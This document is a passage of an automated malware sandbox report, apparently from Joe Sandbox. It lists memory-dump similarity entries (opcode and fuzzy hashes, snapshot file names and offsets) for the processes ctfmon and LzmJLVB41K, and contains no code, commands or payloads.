• API ID:
• String ID:
• API String ID:
• Opcode ID: 02a7df2e28b2761d34609b1edde833e0a966e55296b6a2ae4da1c3a23afc34c0
• Instruction ID: c2c4388c839990767a0f456063868630f18d8f74fd1564459797eac74aefeb65
• Opcode Fuzzy Hash: 02a7df2e28b2761d34609b1edde833e0a966e55296b6a2ae4da1c3a23afc34c0
• Instruction Fuzzy Hash: 13412722B0C9551FE754B7FC60BA6FA7795EF8A320B1849BBD04DC71D3DD38A8818284

Memory Dump Source
• Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
• Instruction ID: 8652c006c93b782a3801aa2f9c5a4a1185cc1f841d54c68a3ccf35deb99ca974
• Opcode Fuzzy Hash: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
• Instruction Fuzzy Hash: 3231F73130C9194FD768EB5CE89A9B977D0EF4632130501BBE58AC7166D911EC828782

Memory Dump Source
• Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e08d266453b8044214bc5bc357d2a50769387b0f0418f66e8618d57aa6fc0a7b
• Instruction ID: b282dd84f145f29a36ea781a327d4d91edd5d78a140d10e5f1d02993b772e913
• Opcode Fuzzy Hash: e08d266453b8044214bc5bc357d2a50769387b0f0418f66e8618d57aa6fc0a7b
• Instruction Fuzzy Hash: 0031C421B1CA1A1FE798B7BC64BA6FA63D5DF89321B1455BAE40DC32D3DD38AC414284

Memory Dump Source
• Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b407425975eb48355c8c4a1dce93618c3447e304de50a6402f277cb2a1e5681
• Instruction ID: 860382b3f298ec1d864cb2d55bc36f33628818328b8c0741bab35cadc7f59714
• Opcode Fuzzy Hash: 3b407425975eb48355c8c4a1dce93618c3447e304de50a6402f277cb2a1e5681
• Instruction Fuzzy Hash: 2F21C921B18D5A0FE7D8F76C54AA6B677C6EF9D311B5404B9E50DC32D3DD28AC418281

Memory Dump Source
• Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
• Instruction ID: 8d71182a12ca4557fc3a9a2e80e08b5a3de2469698398fce45db6864e7fa430c
• Opcode Fuzzy Hash: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
• Instruction Fuzzy Hash: F321F336A0D3898FE712DB6898A11DD7FB0EF53320F1542B7D144DB1C2D63826069791

Memory Dump Source
• Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                  • Opcode ID: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction ID: ee099f9becb69fa132d960b96461b51f5ffc9fab4e420bed93cb2536f349bccc
                                                                                                                  • Opcode Fuzzy Hash: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction Fuzzy Hash: 6911A035A0D3899FE712DBB888A11DD7FB0AF53310F0645B6C184DB192D53866059790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction ID: 00bd258087b8aa50fb41ec7739cd0323b6bd41a5294226edbc50420012944a7e
                                                                                                                  • Opcode Fuzzy Hash: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction Fuzzy Hash: 7611AD35A0D3888FE712DBA8C8A02DD7FB0AF53310F0645FAC584DB192D63866499781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction ID: 7ebcc64d21dcadfa3fe12408f194a45b473b2fb467ed13154613d5d822934c91
                                                                                                                  • Opcode Fuzzy Hash: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction Fuzzy Hash: 00019E35A0D3888FE712DBB8C8A029D7FB0AF43310F1941EAC544DB192D6386A459781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction ID: a6f4ff8580bec2c082c93793a63f7ed62790e7166e93df983d1950a6c7e0dc9f
                                                                                                                  • Opcode Fuzzy Hash: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction Fuzzy Hash: 64018F34E0D3899FE712DBB888A429D7FF0AF13310F1941EAC544DB193DA386A449781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction ID: cc1dbcfd56367301f083da3ad46f17e54c088d5b339500f8826ab87fbcf9a650
                                                                                                                  • Opcode Fuzzy Hash: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction Fuzzy Hash: FAE01231B0811647F795AB54C8A07B972A1EF8A300F110078DB5DD33C5DF3CAD009745
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction ID: eb51c2ef2f49df78aeef9a35f10684ed442e681ab93358b0954b3b2169bd7c28
                                                                                                                  • Opcode Fuzzy Hash: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction Fuzzy Hash: 3DC0123061080C8FCA88EB28C894E1473A0FB1A304B950094E00DCB2A1D62AECC2DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction ID: 92a19b049061f1b79014d34d758ce98f48aeec7c507c9c60df3bb14c9814b990
                                                                                                                  • Opcode Fuzzy Hash: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction Fuzzy Hash: C6C0123062880E8FDA80BB28C888924BBA0FF4F301BE908E0E00CC71A1D61998908B02
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction ID: f1bb64264544f2bb3d34ad0b68692d15da6e49be2bd9218b9f4269c231fb326f
                                                                                                                  • Opcode Fuzzy Hash: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction Fuzzy Hash: B7C04C05F5B75B01A9D5736E58E60ADA2409FC7624FE31572D75CD0091AC4D20D52156
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cae9baa72e705eb1ceaca1e5784d3eeabcddd31494b6f6dc20ec9df0c461cba7
                                                                                                                  • Instruction ID: 2aa8b5f6203690bda55239b6d1acb2b451e5f5a5a9f3a59e77c3e8d06ccbac7d
                                                                                                                  • Opcode Fuzzy Hash: cae9baa72e705eb1ceaca1e5784d3eeabcddd31494b6f6dc20ec9df0c461cba7
                                                                                                                  • Instruction Fuzzy Hash: 5FC04C15F1881B46F369775444315FE58565F45704F555434E10DD73CACF2C6E0112C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: b6b10bd4a8ef1bf12007b0086fd591c9700fa20bce66c1c0c6d8702113cc0d71
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: 10B01200E5640F00A494337E0CD206470409F87100FC30070E61CC0081A84D10942242
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 9de2cb9049ecf17efa582cc69677d96a7356e3dd4f836b216ab719e2a342ba91
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: ABC02B10E4800600F3A4573044601FD71414F13300F07C071801ED6480DE2C16043340
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 8363a4f63b37872a1a33cd80781cda2ef3b5766c67e6762943e0c60aedb71b00
                                                                                                                  • Instruction ID: d71072e27152e04ae5b1e859a0418dbeac62c206b972704c86b4eeb4dd1805a7
                                                                                                                  • Opcode Fuzzy Hash: 8363a4f63b37872a1a33cd80781cda2ef3b5766c67e6762943e0c60aedb71b00
                                                                                                                  • Instruction Fuzzy Hash: 1FF0A02164F3C04FCB569A344868445BFA0AF6721074A41EEC046CF1A3DA1C888AC711
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 7d0514ca89d9792722763a999b2ea547575e5740ce59337face6197d4c29f469
                                                                                                                  • Instruction ID: e537cd15f72d439b4d17bc32bd77b2af0f7db23e4361b915b79adf276e263310
                                                                                                                  • Opcode Fuzzy Hash: 7d0514ca89d9792722763a999b2ea547575e5740ce59337face6197d4c29f469
                                                                                                                  • Instruction Fuzzy Hash: 03F0E531A4E3C04FCB16DA3448648557FA0EF6721174A01EFC045CF1E3DA1CC889C701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: fa3430309cb907b39f89e7102ac2ce3623e0cbc1b74ac8b40b74a434649741bf
                                                                                                                  • Instruction ID: 880200472f1ccde895183bce4ebd40d8c4a2e227fb5d935a4d4bb55277256d7c
                                                                                                                  • Opcode Fuzzy Hash: fa3430309cb907b39f89e7102ac2ce3623e0cbc1b74ac8b40b74a434649741bf
                                                                                                                  • Instruction Fuzzy Hash: 64F0657164E3C04FCB16EA3848694557FA1EF6721174951EEC045CF1A7DA1DDC85C741
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 3b60b898ba252dd3bcdf1d5d13f51ef265d62053392955c7882d396e3e54edcb
                                                                                                                  • Instruction ID: 61e760a8f13bffe74a053450f749c4c6b2c9813dda591ecdd0f2bb60b567d64c
                                                                                                                  • Opcode Fuzzy Hash: 3b60b898ba252dd3bcdf1d5d13f51ef265d62053392955c7882d396e3e54edcb
                                                                                                                  • Instruction Fuzzy Hash: 88E0126154E3C04FCB55AB3484A58553FA0EF6721078A40DEC145CB1B3E61D8846C701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 5ef45d3046cb215dfa72346539609a5a730a65416d750d2608aa4e67270a48a7
                                                                                                                  • Instruction ID: 1c8d99431eda0f6a9a369b3442355808c408c05adf1d905126c1db1218a02e08
                                                                                                                  • Opcode Fuzzy Hash: 5ef45d3046cb215dfa72346539609a5a730a65416d750d2608aa4e67270a48a7
                                                                                                                  • Instruction Fuzzy Hash: 4CE0E57154E7D04FCB46EB3488698447FA0AE6721078A44EEC185CF1B3E62E9849CB01
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 77ad75caabefd70dca60e4a01bd0194f01ee93901004744d98c8da1de6d59ab2
                                                                                                                  • Instruction ID: af17feaacf86eb1c48227f3cb6ad7558113d9fbef8c21e3176f33d3882c4acd6
                                                                                                                  • Opcode Fuzzy Hash: 77ad75caabefd70dca60e4a01bd0194f01ee93901004744d98c8da1de6d59ab2
                                                                                                                  • Instruction Fuzzy Hash: 17E01A7054E3C08FCB0AEB3488A98447FA0AE6B21078B41EEC145CF5B3D62D8849CB01
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9a41c86d58fad32ffbba829b54896a878291275611a3e82ca99073105c693c91
                                                                                                                  • Instruction ID: 35aebe87600fba75aaf046dacb87868d4a27a2af3af371ef7ded9273d20874bd
                                                                                                                  • Opcode Fuzzy Hash: 9a41c86d58fad32ffbba829b54896a878291275611a3e82ca99073105c693c91
                                                                                                                  • Instruction Fuzzy Hash: 90719131B589098FDB98EF68C0E56A973E2FF99300F544978D10ED3296DE38E842DB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e70b87af47674a1d5e4f32cca42391052a918828681cf7d9fc1937a5f0e772b
                                                                                                                  • Instruction ID: 4df7993091386ed2738ca3a56ecf3fc2d282293d81d94c56b6f19377965ca958
                                                                                                                  • Opcode Fuzzy Hash: 3e70b87af47674a1d5e4f32cca42391052a918828681cf7d9fc1937a5f0e772b
                                                                                                                  • Instruction Fuzzy Hash: 1251D636B0C6554FE721ABAC98A72EA3BA4EF47321F0801B6D54CD7183DE78684596C2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 88430e2872405b040964f07c3046d503681042ee69b9400cc35aa6602a2b35e5
                                                                                                                  • Instruction ID: 3c6931c7b06134421a5a0f76061da39bc4f7330df23f82ee55cec4aab2cf80ec
                                                                                                                  • Opcode Fuzzy Hash: 88430e2872405b040964f07c3046d503681042ee69b9400cc35aa6602a2b35e5
                                                                                                                  • Instruction Fuzzy Hash: C851D672A1878A4FE795DBA888B53A97FE2FF96300F4540BAD04DD72D2CE782805C740
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f92cf2833e1f9b0938a20a4d2621c1015dd1a95efc54cba4b4b373384803a81e
                                                                                                                  • Instruction ID: a38bdd21c77a70a60dfa2b8512c13e1a9e295b00fe9d764a99dced19add6a960
                                                                                                                  • Opcode Fuzzy Hash: f92cf2833e1f9b0938a20a4d2621c1015dd1a95efc54cba4b4b373384803a81e
                                                                                                                  • Instruction Fuzzy Hash: 2D413726B095555BD212BBFCB8B20EA77A4DF4232DB4C13B2D19CCB083FD79205A8295
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0cbceaf423dc71d2ef1098e0abc13815ad071b2fe7dd3b2fd1e14bda0d3bf79a
                                                                                                                  • Instruction ID: 49206ac1864d45967fd2ac0db96ea0d93e278dfc03cb4661c647ea72fc3e48e5
                                                                                                                  • Opcode Fuzzy Hash: 0cbceaf423dc71d2ef1098e0abc13815ad071b2fe7dd3b2fd1e14bda0d3bf79a
                                                                                                                  • Instruction Fuzzy Hash: 19412512B0C9551FE754B7FC60BA6F97795EF8A320B0849BBD04DC7193DD28A8818280
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: abc5d74662a1ac53c790a6a816a8275d6c8b3c7702d452744a454c87e8a84a26
                                                                                                                  • Instruction ID: 5c750405cf07ffdeebd51b6fb3c1be81aa706e628411702bdb624051e24b217e
                                                                                                                  • Opcode Fuzzy Hash: abc5d74662a1ac53c790a6a816a8275d6c8b3c7702d452744a454c87e8a84a26
                                                                                                                  • Instruction Fuzzy Hash: C7419F31B189098FDB94EF68C4A46A973E2FF98310F540679D11ED3691DB38E8828B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
                                                                                                                  • Instruction ID: 8652c006c93b782a3801aa2f9c5a4a1185cc1f841d54c68a3ccf35deb99ca974
                                                                                                                  • Opcode Fuzzy Hash: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
                                                                                                                  • Instruction Fuzzy Hash: 3231F73130C9194FD768EB5CE89A9B977D0EF4632130501BBE58AC7166D911EC828782
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b9ecabe0329433efd96a451ffda02fc243b2628ce5c1e69a1b6438a958d5d0b6
                                                                                                                  • Instruction ID: 71a5c947404358e3256cee76ce30c979c2b23ede50616a786bb63143082f1420
                                                                                                                  • Opcode Fuzzy Hash: b9ecabe0329433efd96a451ffda02fc243b2628ce5c1e69a1b6438a958d5d0b6
                                                                                                                  • Instruction Fuzzy Hash: A631E712B1C9191FE794B3BC64BA6F963C6DF89321B18447AE40DC32D3DD38AC814284
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7c40c1bccd88c1e68154aee766facb1f4914f08c673b160a7f848ca3b014e32a
                                                                                                                  • Instruction ID: 0cc0bfff8c6d8ab896a02575dc2395a04e4d7a8397d4dee362eab0308defac94
                                                                                                                  • Opcode Fuzzy Hash: 7c40c1bccd88c1e68154aee766facb1f4914f08c673b160a7f848ca3b014e32a
                                                                                                                  • Instruction Fuzzy Hash: 27310832B0C9494FEB65EB18C8697E537D1EB96310F0402BBD44DD72C2DE686C4587C1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ebe9285944bf4ccb734a531343d0fe6932c7e7c3f780becdad6a6fbf77e00046
                                                                                                                  • Instruction ID: 46df3edf82dd2d7e825e8b800eda463dc05d10d050bd7868a4bfd5a0bfd43534
                                                                                                                  • Opcode Fuzzy Hash: ebe9285944bf4ccb734a531343d0fe6932c7e7c3f780becdad6a6fbf77e00046
                                                                                                                  • Instruction Fuzzy Hash: A5210B21B689590FE798F76C54BE6B577C6EF9D311B5404B9E40DC32D3DD28AC418280
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
